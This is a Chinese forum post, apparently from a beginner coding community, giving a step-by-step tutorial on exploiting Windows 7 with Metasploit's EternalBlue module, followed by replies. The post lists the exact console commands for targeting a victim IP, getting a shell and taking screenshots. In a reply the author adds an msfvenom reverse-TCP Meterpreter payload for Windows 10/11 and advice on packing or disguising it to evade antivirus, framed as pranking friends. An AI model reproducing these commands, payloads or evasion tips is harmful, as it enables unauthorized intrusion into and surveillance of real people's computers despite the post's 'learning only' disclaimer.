猫史档案馆


黑客入门——利用永恒之蓝攻击Windows7

用户:PlumStevenPlumSteven查看:19 回复:25 评论:19 创建时间:2022-12-27T13:25:23


*本教程仅供学习,不可以用来害人啊!*

 

操作系统的教程我先不更,周末再更啊

这是一个黑客教程(想啥呢,不是教你搞病毒的!),今天我们来学一学利用永恒之蓝攻击Windows

永恒之蓝是啥?什么?这都不知道?它是一个利用Smb的漏洞来获取Windows最高权限(SYSTEM用户)的一个程序

比特币病毒总知道吧?就是用的永恒之蓝

不过好像只能搞Windows7哎。。。

那我们现在就开始吧!

首先安装开发环境啊,就是kali Linux(黑客工具自带一大堆),给大家展示我的(我的是美化过的):center_image

自行去官网下载(他还贴心的为你准备了安装好的VMware和Vbox虚拟机~),或者自己去网上搜索

如果你是从官网下载的虚拟机,注意了!用户名和密码都是kali

 

搞好了之后,我们打开终端(没有人不会吧),就可以开始攻击啦!

我们用到的工具是msf(这个是简称,全称我忘了)

1.初始化数据库:msfdb init

2.启动msf控制台:msfconsole

msfconsole命令执行效果:center_image

图案可能不一样(我见过一堆奇葩图案了)这个不重要

只要出现了msf6>就彳亍

接下来,我们想要知道永恒之蓝这个漏洞的名称,所以输入search ms17_010

即搜索ms17_010(自己去查询永恒之蓝就知道为什么是ms17_010了)

 

然后找到eternal_blue的那个选项,即为exploit/windows/喵b/ms17_010_eternalblue

然后use exploit/windows/喵b/ms17_010_eternalblue

就会出现这个:center_image

恭喜你!完成了一大半了!

接下来我们要配置选项

输入show options

找到RHOSTS那一栏,这个就是受害者的IP

找到你的Windows7的IP地址,即在cmd输入ipconfig,然后找到那个Ipv4对应的东东

设置RHOSTS:set RHOSTS ***(你的IP地址)

然后你还可以设置LPORT(即收听端口,随你设置,只要是0~65535中没被占用的端口,默认4444),和上面方法一样,即为set LPORT ****(你想要的端口)

全部设置完毕后,就可以开始攻击了!

输入run或者exploit,时间可能会有点久(注意!被攻击的电脑要关闭防火墙并且外部可以ping通:即在你的Kali中新打开一个命令行,输入ping IP地址,如果能一直传输数据(大概这样额:*** bytes from *****),就是可以Ping通的。如果没法Ping通,自行去度娘那里搜索)

 

如果你成功了,就会看到以下界面center_image

原谅我把ip涂掉了,防止你们拿我的电脑下黑手。。。

好了!你已经成功入侵了!

接下来。。。嘿嘿嘿

你可以shutdown关机,或者shell进入windows命令行为所欲为(别犯法啊!你自己的虚拟机和电脑没关系,别整喵那儿去了)

我的shutdown坏了,所以给你们看看其他的:center_image

screenshot:截图命令

找到他给出的路径,看到多了一张图:


center_image

(免费监视器.jpg)

今天的教程就到这里了,拜拜~


回复

上一页1 页 / 共 1下一页
PlumStevenPlumSteven

文中的喵是"s///////////////////m"

点赞0


评论


盗码师盗码师

……

点赞0


评论


DpNoDpNo

好家伙

点赞0


评论


PlumStevenPlumSteven

喵d

点赞0


评论


火菊火菊

Mac不讲武德()

点赞0


评论


AucunAucun

ip没涂好

点赞1


评论


FireGuoFireGuo

注:其实kali linux是可以直接生成攻击软件的,无需永恒之蓝。

点赞1


评论


小鹿UUyM小鹿UUyM

ddd

点赞0


评论


小萝卜cXsQ小萝卜cXsQ

你们别找他催更操作系统教程了,他的ubuntu崩了[悲]

点赞0


评论


再见2再见2

11

 

点赞0


评论


无影神K无影神K

我的电脑就是win7,我还有个win10的!

 

点赞0


评论


limit_breakrlimit_breakr

削 夕

点赞0


评论


Dragon丶半退Dragon丶半退

==========

点赞0


评论


三体_歌者三体_歌者

完了,我是W7!!!啊啊啊!

点赞1


评论


小萝卜cXsQ小萝卜cXsQ

win7停服后所有win7电脑都危险了。。。企业还是不要用win7了,代价太大了。。。

点赞0


评论


L泡咖啡的可可豆IL泡咖啡的可可豆I

!他在试图教会我们!emotion_doge

点赞0


评论


PlumStevenPlumSteven

好我顺便顶一下,win10和win11的方法如下:

也是打开msfconsole,不过这次不用选择模块

直接msfvenom -p windows/meterpreter/reverse_tcp LHOST=本机地址 LPORT=这个端口随便选,和文中要求一样 -f exe -o 随便取个名字.exe

 

这样就生成了一个exe,放到靶机上面运行,然后在你的kali上面运行sessions查看中毒的机器,sessions -i 编号 就可以选择侵入哪个机器,这样就能得到windows的powershell,可以给你的好基友远程关机啦~

 

当然单单这样生成是会被s毒软件s的,这里建议给病毒套个加密壳,或者使用-x参数伪装成一个应用程序,这样就可以运行了。

 

附:文章中喵是s/m

点赞2


评论


贺鸣Herman贺鸣Herman

《“比特币病毒”》这么安全的比特币能被入侵?

点赞1


评论


贺鸣Herman贺鸣Herman

好厉害,我拿去.(入).-.(侵)别人了

点赞0


评论


原力开发原力开发

哈哈,只能是win7及以下了……这个漏洞早修复了……这个……也就是个门槛

点赞0


评论


DreamSapnapDreamSapnap

你不会是SCS的吧

 

点赞0


评论


开心213开心213

66

点赞0


评论


不知道该叫啥的一只萌新不知道该叫啥的一只萌新

可能楼主写的时候能力不太够,你涂的ip地址是192开头的,是局域网ip,也就是说得在同一wifi下才能攻击,完全不用涂...

点赞0


评论


童梦铁运(别选高中政治)童梦铁运(别选高中政治)

能攻击安卓和鸿蒙吗?

点赞0


评论


PlumStevenPlumSteven

既然这么多人喜欢看,那我放个最近写的文就当打广告了 shequ.codemao.cn/community/697594

点赞1


评论